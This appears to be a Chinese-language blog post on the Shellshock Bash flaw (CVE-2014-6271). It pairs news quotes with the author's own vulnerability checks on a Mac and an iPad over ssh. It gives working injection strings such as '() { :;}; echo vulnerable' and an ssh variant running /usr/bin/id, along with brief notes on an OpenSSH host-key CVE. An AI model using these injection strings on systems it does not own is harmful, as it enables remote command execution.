Bash漏洞

Bash漏洞爲遠程解析命令執行漏洞(CVE-2014-6271),可以直接在Bash支持的Web CGI環境下遠程執行任何命令。這也就使得一些路由器、堡壘機、VPN等網絡設備將會成爲重災區,另外各大Linux發行版和Mac OS X系統都受影響,甚至Android也會受到影響。 

Bash漏洞將影響基於Unix平臺的操作系統,包括Linux和Mac OS X。利用Bash漏洞的方法也更簡單——只需要剪切和粘貼一行代碼即可。

Bash是一款軟件,被用於控制衆多Linux電腦上的命令提示符。安全專家稱,黑客可以利用Bash中的漏洞完全控制目標系統。
  美國國土安全部下屬計算機緊急響應小組(US-CERT)發佈警告稱,Bash漏洞將影響基於Unix平臺的操作系統,包括Linux和Mac OS X。US-CERT建議電腦用戶從軟件開發商處獲取系統更新。US-CERT稱,包括紅帽在內的Linux系統提供商已經準備好了更新補丁,但未提及OS X是否提供系統更新。蘋果發言人無法取得聯繫。
  谷歌安全研究員塔維斯·奧曼迪(Tavis Ormandy)在Twitter上表示,Linux系統提供商推出的補丁似乎“並不完整”,這引發了幾位安全專家的擔憂。
  網絡安全公司Rapid7工程部經理託德·貝爾德斯利(Tod Beardsley)警告稱,Bash漏洞的嚴重級別爲“10”,意味着它對用戶電腦的威脅最大。Bash漏洞的利用複雜度級別爲“低”,意味着黑客可以相對輕鬆地利用它發動攻擊。
  另有網絡安全公司Trail of Bits的CEO丹·古德(Dan Guido)表示,“心臟流血”漏洞能夠允許黑客監控用戶電腦,但不會取得控制權。此外,利用Bash漏洞的方法也更簡單——只需要剪切和粘貼一行代碼即可。
檢測服務器是否存在這個漏洞的方法:
ssh [email protected] '() { ignored; }; /usr/bin/id'
如果輸出下面內容表示服務器存在此漏洞:
uid=1001(git) gid=1001(git) groups=1001(git)
如果你看到的是 Not allowed command 說明不存在此漏洞。

以上的測試方法我沒有試通,因爲我沒有註冊git賬號,好了在我的虛擬機的os mac系統裏可以這樣測試:

在終端窗口裏輸入:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

返回是:

bash-3.2$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

證明我的系統裏的bash也存在此漏洞


下面看看Openssh能不能利用這個漏洞呢,我的想法是很美好的,希望登陸ssh時通過此漏洞不再要輸入密碼,但我忘了一點,這個是bash漏洞不是ssh漏洞!

還是用老辦法:

在第一個終端的端口轉發的目錄下運行

./tcprelay.py -t 22:2222

在第二個終端下運行:

 ssh -p 2222 [email protected] env '() { ignored; }; echo hello'

然後會讓你輸入密碼

密碼爭取就會運行後面的漏洞溢出執行顯示:

[email protected]'s password: 

hello

完全的是這樣:

wls-Mac:~ wl$ ssh -p 2222 [email protected] env '() { ignored; }; echo hello'
[email protected]'s password: 
hello
wls-Mac:

唯一和我原來用ssh連接到ipad mini不同的是,原來的直接就顯示的是iPad mini的終端平臺,而現在這種方式每次要通過bash漏洞溢出執行ipad裏的命令,執行完以後還是回到mac os 的終端,但每次都要輸入密碼,所以這個漏洞對於ssh密碼來說是沒有用的。


引申:

從這個bash我想到查一查我的ipad mini的openssh有沒有漏洞可以利用呢,通過ssh -V命令看出版本是6.1p1,結果在網上真的查出6.6以下都有的一個漏洞:

OpenSSH‘verify_host_key’函數輸入驗證漏洞(CNNVD-201403-502)

        OpenSSH(OpenBSD Secure Shell)是OpenBSD計劃組所維護的一套用於安全訪問遠程計算機的連接工具。該工具是SSH協議的開源實現,支持對所有的傳輸進行加密,可有效阻止竊聽、連接劫持以及其他網絡級的攻擊。 
        OpenSSH 6.6及之前版本的客戶端中的sshconnect.c文件的‘verify_host_key’函數存在安全漏洞。遠程攻擊者可通過提供證書利用該漏洞跳過SSHFP DNS RR檢查。






發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章